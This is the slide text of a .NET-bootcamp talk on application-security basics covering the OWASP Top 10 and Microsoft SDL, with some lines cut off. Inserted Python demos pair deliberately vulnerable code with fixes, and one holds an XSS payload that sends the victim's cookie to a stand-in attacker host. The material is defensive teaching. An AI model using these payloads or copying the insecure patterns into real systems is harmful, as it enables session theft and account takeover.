This presentation is part of a talk I gave at the Microsoft .NET Bootcamp. The contents are slightly edited to share the information in the public domain. In this presentation, I tried to cover the broader aspects of Application Security basics. This presentation will be useful for software architects, managers, developers and QAs. Do share your feedback in the comments.
Social engineering. Many attacks attempt to appear as if they originated from a system administrator or official service, increasing the likelihood that end users will execute them and infect their systems.

Trojan horse. A program that appears to be useful or harmless but that contains hidden code designed to exploit or damage the system on which it is run. Trojan horse programs are most commonly delivered to users through e-mail messages that misrepresent the program's purpose and function. Also called Trojan code. A Trojan horse does its damage by delivering a malicious payload or task when it is run.

Worm. A worm uses self-propagating malicious code that can automatically distribute itself from one computer to another through network connections. A worm can take harmful action, such as consuming network or local system resources, possibly causing a denial of service attack. Some worms can execute and spread without user intervention, while others require users to execute the worm code directly in order to spread. Worms may also deliver a payload in addition to replicating.

Virus. A virus uses code written with the express intention of replicating itself. A virus attempts to spread from computer to computer by attaching itself to a host program. It may damage hardware, software, or data. When the host is executed, the virus code also runs, infecting new hosts and sometimes delivering an additional payload.
- Now we no longer have websites, we have web applications
- Web applications reside on multiple systems in distributed architectures
- Three tiers (presentation, logic, data)
- Use sophisticated programming languages and architectures
- Corporate and customer data moved to the computing edge
- Edge extended to cellphones, PDAs, mobile sales force solutions, inventory management systems, etc.
There is a lack of awareness of application vulnerabilities in security departments. Security departments scrutinize the desktop, the network, and even the web servers, but the web application escapes their measures. Even in departments that want to audit for web application vulnerabilities, the lack of effective tools has made it impractical. As a result, Certification and Accreditation programs rarely examine the web application. In fact, the entire development cycle is usually missing from security procedures and controls. This illustrates the fundamental gap between security and development, which creates these web application vulnerabilities. Many traditional information security practitioners are ill-equipped to mitigate application security issues:
– Little to no experience coding
– No experience coding in “modern” enterprise environments like .NET and J2EE
– Understand that there are risks, but not in a position to address them
Application Security - Understanding The Horizon
Understanding The Horizon
Foundations of Security
Layered Security Approach
Importance of Application Security
OWASP Top 10 Threats
Bridging The Gap-Step by Step
Microsoft Security Development Lifecycle (MS-SDL)
Measurable results of applying MS-SDL
Why should you know hacking?
Developers need to hone their cyber-offence skills
Hack your own website
If you can’t think like a hacker, it's difficult to defend against them
First website security assessment
Defense in depth
Fix multiple security flaws that would otherwise have been single point of
Who are hackers?
Motivated by a higher cause
Motivated by financial gain, identity theft, malicious intentions
Cyber warfare for national security and political interest
Social Media Websites/Portals
Your security “perimeter” has huge holes at the application layer
“We are secure since we have a firewall!”
You can’t use (firewall, SSL, IDS, to stop or detect
Common Sources of Untrusted Data
• In URL via a query string or route
• Posted via a form
• Request Headers
• External Services
• Your own database!
Building A Risk Profile
Attackers want to understand as much as possible about the website in order to find its vulnerabilities, so they analyze:
• What are the points of untrusted data entry?
• What sanitization practices have been employed?
• What framework and libraries is the website running on?
• What can be discovered about the site structure?
• What can be learned from the “view source” option of browsers?
• Are any useful internal error messages sent up to the browser?
• Are there sufficient access controls on diagnostic data?
“Information security is the practice of defending information from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction.”
Foundations of Application Security
Authentication = Who are you?
Authorization = What can you do?
Auditing (Non-repudiation) = Cannot deny your action
Confidentiality (Privacy) = Data remains private and confidential
Integrity = Data is protected from unauthorized modification
Availability = System remains available
Attacks are focusing on applications
[Chart: operating system vs. browser and application vulnerabilities, from the Microsoft Security Intelligence Report V7]
Sources: IBM X-Force, 2008
Importance of Application Security
Web applications have the largest number of vulnerabilities.
Sources: Sept 2009 Report with data from TippingPoint IPS and vulnerability data by Qualys.
Web Applications Complexity
Very complex architectures, multiple platforms and protocols
Web Applications Breach Perimeter
[Diagram: the firewall allows HTTP (port 80) and HTTPS (port 443) through to the web server, and only allows the web server to talk to the database]
OWASP Top 10 Threats
Injection
Attacker can manipulate queries to the DB / LDAP / other systems
Hackers can access backend database information, alter it or steal
Broken Authentication & Session Management
Session tokens not guarded or invalidated
Hacker can “force” a session token on a victim; session tokens can be stolen after logout
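The two failures named above, session fixation (a token “forced” on the victim) and a token that stays valid after logout, as an added example that is not part of the original deck. The in-memory session store, the planted id and the user names are assumptions for the demo; the hardened login regenerates the id at authentication and logout invalidates it server-side.

```python
import secrets


class SessionStore:
    """In-memory session table (example only): session id -> attributes."""

    def __init__(self):
        self._sessions = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)  # unguessable, 256 bits of entropy
        self._sessions[sid] = {"user": None}
        return sid

    def get(self, sid: str):
        return self._sessions.get(sid)

    def login_fixation_prone(self, sid: str, user: str) -> str:
        """Weak: authenticates into whatever id the client presented, even one
        the server never issued, and keeps that id after login."""
        self._sessions.setdefault(sid, {"user": None})
        self._sessions[sid]["user"] = user
        return sid

    def login_hardened(self, sid: str, user: str) -> str:
        """Hardened: discard the pre-authentication session and issue a fresh id,
        so an id planted on the victim before login is worthless afterwards."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def logout(self, sid: str) -> None:
        """Invalidate server-side; a token stolen earlier no longer resolves."""
        self._sessions.pop(sid, None)


def fixation_attack(store: SessionStore, login) -> bool:
    """Attacker plants a known session id on the victim (for example through a
    URL parameter or an injected cookie); the victim logs in; the attacker then
    presents the planted id. Returns True if the attacker now holds the
    victim's authenticated session."""
    planted_sid = "attacker-chosen-id"
    login(planted_sid, "victim")
    hijacked = store.get(planted_sid)
    return hijacked is not None and hijacked["user"] == "victim"


if __name__ == "__main__":
    print(fixation_attack(SessionStore(), SessionStore().login_fixation_prone))
    store = SessionStore()
    print(fixation_attack(store, store.login_hardened))  # False
    sid = store.login_hardened(store.new_session(), "alice")
    store.logout(sid)
    print(store.get(sid))  # None: the old token is dead after logout
```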
Cross-Site Scripting
Identity theft, sensitive information leakage,
Hackers can impersonate legitimate users and control their
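An added example of the reflected XSS described above (not code from the original deck): a search term is echoed back into the page, once unencoded and once encoded for its HTML context with the standard library's html.escape. The payloads, the markup fragments and the check helper are constructed for the demo.

```python
import html

# Constructed payloads: what an attacker submits to a search box. The first
# ships the victim's cookie to the attacker; the second breaks out of an
# attribute value and attaches an event handler.
COOKIE_THEFT = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
ATTR_BREAKOUT = '" onfocus="alert(document.cookie)" autofocus="'


def render_results_vulnerable(term: str) -> str:
    """Reflects the term into HTML text unencoded: the payload becomes markup."""
    return "<p>Results for: " + term + "</p>"


def render_results_escaped(term: str) -> str:
    """Encodes for the HTML text context: < > & " ' become entities and stay inert."""
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


def render_input_vulnerable(term: str) -> str:
    """Reflects into an attribute value: a quote in the input ends the attribute."""
    return '<input name="q" value="' + term + '">'


def render_input_escaped(term: str) -> str:
    """quote=True is what makes this safe inside a double-quoted attribute."""
    return '<input name="q" value="' + html.escape(term, quote=True) + '">'


def has_live_markup(rendered: str) -> bool:
    """Demo check: does the output contain an unencoded tag or event handler?"""
    low = rendered.lower()
    return "<script" in low or ' onfocus="' in low


if __name__ == "__main__":
    print(render_results_vulnerable(COOKIE_THEFT))  # script runs in the victim's browser
    print(render_results_escaped(COOKIE_THEFT))     # shown as text
    print(render_input_vulnerable(ATTR_BREAKOUT))   # handler injected
    print(render_input_escaped(ATTR_BREAKOUT))      # quotes become &quot;
```

Encoding must match the output context: the same html.escape is not sufficient inside a JavaScript string, a URL or a CSS value, where a different encoder is needed.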
Insecure Direct Object Reference
Attacker can access sensitive files and
Web application returns contents of sensitive file (instead of
Security Misconfiguration
Attackers can gain detailed system
Malicious system investigation may assist in developing further
Sensitive Data Exposure
Sensitive info sent unencrypted over insecure
Unencrypted credentials “sniffed” and used by hacker to
Missing Function Level Access Control
Attacker can access unauthorized resources
Hacker can forcefully browse and access a page past the login
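One added example covering both the Insecure Direct Object Reference entry and the Missing Function Level Access Control entry above (it is not code from the original deck). The invoice table, the user roles and the admin action are assumptions for the demo. The object-level check ties each record to its owner; the function-level check is a decorator enforced on every call, so hiding the link in the UI is not what protects the action.

```python
from dataclasses import dataclass
from functools import wraps


@dataclass
class User:
    name: str
    role: str


class Forbidden(Exception):
    """Raised when an access check fails (maps to HTTP 403 in a real app)."""


# Constructed sample data: invoice id (as it appears in the URL) -> record.
INVOICES = {
    101: {"owner": "alice", "total": 120.0},
    102: {"owner": "bob", "total": 75.5},
}


def get_invoice_idor(current_user: User, invoice_id: int) -> dict:
    """Insecure direct object reference: the id from the URL is trusted as-is,
    so bob reads alice's invoice just by changing 102 to 101."""
    return INVOICES[invoice_id]


def get_invoice_checked(current_user: User, invoice_id: int) -> dict:
    """Object-level check: the record must belong to the caller, or the caller
    is an admin. Unknown ids get the same Forbidden as foreign ids, so the
    response does not reveal which ids exist."""
    inv = INVOICES.get(invoice_id)
    if inv is None or (inv["owner"] != current_user.name and current_user.role != "admin"):
        raise Forbidden(f"{current_user.name} may not read invoice {invoice_id}")
    return inv


def require_role(role: str):
    """Function-level check enforced server-side on every invocation."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(current_user: User, *args, **kwargs):
            if current_user.role != role:
                raise Forbidden(f"{current_user.name} lacks role {role}")
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


def delete_user_unprotected(current_user: User, target: str) -> str:
    """Missing function-level access control: any authenticated user who knows
    or guesses the URL of the admin action can call it."""
    return f"deleted {target}"


@require_role("admin")
def delete_user_protected(current_user: User, target: str) -> str:
    return f"deleted {target}"


def is_denied(fn, *args) -> bool:
    """Helper for the demo: True if the call is refused by an access check."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    bob = User("bob", "user")
    print(get_invoice_idor(bob, 101))                     # alice's invoice leaks
    print(is_denied(get_invoice_checked, bob, 101))       # True
    print(delete_user_unprotected(bob, "alice"))          # forced browsing succeeds
    print(is_denied(delete_user_protected, bob, "alice")) # True
```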
Cross-Site Request Forgery
Attacker can invoke “blind” actions on web applications, impersonating a trusted user
Blind requests to bank account transfer money to hacker
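The bank-transfer scenario above as an added example (not code from the original deck). The victim's browser attaches the session cookie to a form auto-submitted from the attacker's page, so the unprotected endpoint moves the money; the protected endpoint also demands a synchronizer token that only the bank's own page can embed. The token here is an HMAC of the session id under a server secret; the session table, balances and field names are assumptions for the demo.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed server state: a per-deployment secret and the session table.
SECRET_KEY = secrets.token_bytes(32)
SESSIONS = {"sess-victim": "victim"}  # session cookie value -> logged-in user


def fresh_balances() -> dict:
    return {"victim": 1000, "attacker": 0}


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: HMAC(secret, session id).
    The bank embeds it in its own transfer form; a third-party page cannot
    read it (same-origin policy) or compute it (no secret)."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: str) -> bool:
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, token or "")  # constant-time compare


def _do_transfer(balances: dict, user: str, to: str, amount: int) -> str:
    if to not in balances or balances.get(user, 0) < amount:
        return "failed"
    balances[user] -= amount
    balances[to] += amount
    return "ok"


def transfer_unprotected(balances: dict, session_cookie: str, form_body: str) -> str:
    """Vulnerable: authentication rests on the cookie alone, which the browser
    sends automatically, so a forged cross-site POST is accepted as the victim."""
    user = SESSIONS.get(session_cookie)
    if user is None:
        return "unauthenticated"
    params = parse_qs(form_body)
    return _do_transfer(balances, user, params["to"][0], int(params["amount"][0]))


def transfer_protected(balances: dict, session_cookie: str, form_body: str) -> str:
    """Hardened: the request must also carry the token issued for this session."""
    user = SESSIONS.get(session_cookie)
    if user is None:
        return "unauthenticated"
    params = parse_qs(form_body)
    token = params.get("csrf_token", [""])[0]
    if not verify_csrf_token(session_cookie, token):
        return "rejected"
    return _do_transfer(balances, user, params["to"][0], int(params["amount"][0]))


if __name__ == "__main__":
    # The "blind" request: the victim's browser POSTs this with the victim's cookie.
    forged = "to=attacker&amount=500"
    print(transfer_unprotected(fresh_balances(), "sess-victim", forged))  # ok
    print(transfer_protected(fresh_balances(), "sess-victim", forged))    # rejected
    legit = forged + "&csrf_token=" + issue_csrf_token("sess-victim")
    print(transfer_protected(fresh_balances(), "sess-victim", legit))     # ok
```

Modern frameworks ship this token handling (and the SameSite cookie attribute adds a second layer), but the check still has to be wired to every state-changing endpoint.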
Using Components with Known Vulnerabilities
Attacker can exploit vulnerable component
to gain access to system
Attacker can cause data loss and even take over the server.
Unvalidated Redirects and Forwards
Attacker can redirect victims to phishing sites
Attacker can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages
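An added example of validating a redirect target (not code from the original deck): the typical login page takes a ?next= parameter and, unvalidated, sends the victim wherever a phishing link says. The hardened version allows only site-local paths or https URLs to an allow-listed host, and rejects the protocol-relative and userinfo tricks that commonly slip past naive checks. The allowed host list is an assumption for the demo.

```python
from urllib.parse import urlsplit

# Hosts we are willing to send users to (assumption for the demo).
ALLOWED_HOSTS = {"www.example.com"}
DEFAULT_TARGET = "/"


def redirect_unvalidated(next_url: str) -> str:
    """Vulnerable: the ?next= value becomes the Location header unchecked."""
    return next_url


def safe_redirect_target(next_url: str) -> str:
    """Return a redirect target that stays on this site or an allow-listed host;
    anything else collapses to DEFAULT_TARGET."""
    if not next_url:
        return DEFAULT_TARGET
    parts = urlsplit(next_url)
    if parts.scheme or parts.netloc:
        # Absolute URL: only https to an allow-listed host. Compare the parsed
        # hostname, so "https://www.example.com@evil.example/" (userinfo trick)
        # and "javascript:" pseudo-URLs are both refused.
        if parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS:
            return next_url
        return DEFAULT_TARGET
    # Relative URL: must be a plain site-local path. Browsers read "//host" and
    # "///host" as scheme-relative and treat backslashes as slashes, so reject
    # those forms explicitly rather than trusting the parser's view.
    if next_url.startswith("//") or "\\" in next_url or not next_url.startswith("/"):
        return DEFAULT_TARGET
    return next_url


if __name__ == "__main__":
    for candidate in ["/account", "//evil.example/x", "https://evil.example/phish",
                      "https://www.example.com/dash", "javascript:alert(1)"]:
        print(candidate, "->", safe_redirect_target(candidate))
```

Forwards (server-side dispatch to another page) need the analogous rule: the target must come from a fixed map of allowed pages, never from the request, or the forward becomes a way past the login check.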
Application Developers and QA
“As a Network Security Professional, I don’t know how my company’s web applications are supposed to work, so I deploy a protective solution…but don’t know if it’s protecting what it’s
“As an Application Developer, I can build/test great features and functions while meeting deadlines, but I don’t know how to develop/test my web application with security as a feature.”
Bridging The Gap-Step by Step
Prioritize application security as an important non-functional
Improve awareness of application security in developers and QAs.
Incorporate security in SDLC.
Define clear role and responsibility towards application security
Promote Penetration testing of application
Microsoft Security Development Lifecycle
• Administer and track
• Guide product teams to meet SDL requirements
• Establish release criteria and sign-off as part of FSR
• Ongoing process improvements
Measurable results: Microsoft SDL and Windows Vista
[Chart: vulnerabilities disclosed one year after release; 45% reduction in vulnerabilities]
Source: Windows Vista One Year Vulnerability Report, Microsoft Security Blog, 23 Jan 2008
Measurable results: Microsoft SDL and SQL Server
[Chart: total vulnerabilities disclosed 36 months after release, SQL Server 2000 vs SQL Server 2005 vs a competing commercial DB; 91% reduction in vulnerabilities]
Sources: Analysis by Jeff Jones (Microsoft TechNet security blog)
OWASP (Open Web Application Security Project):
This presentation is shared under Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International license. More information for this license is available at http://creativecommons.org/licenses/by-nc-sa/4.0/
All trademarks are the property of their respective owners. Lalit Kale makes no warranties, express, implied or statutory, as to the information in this presentation.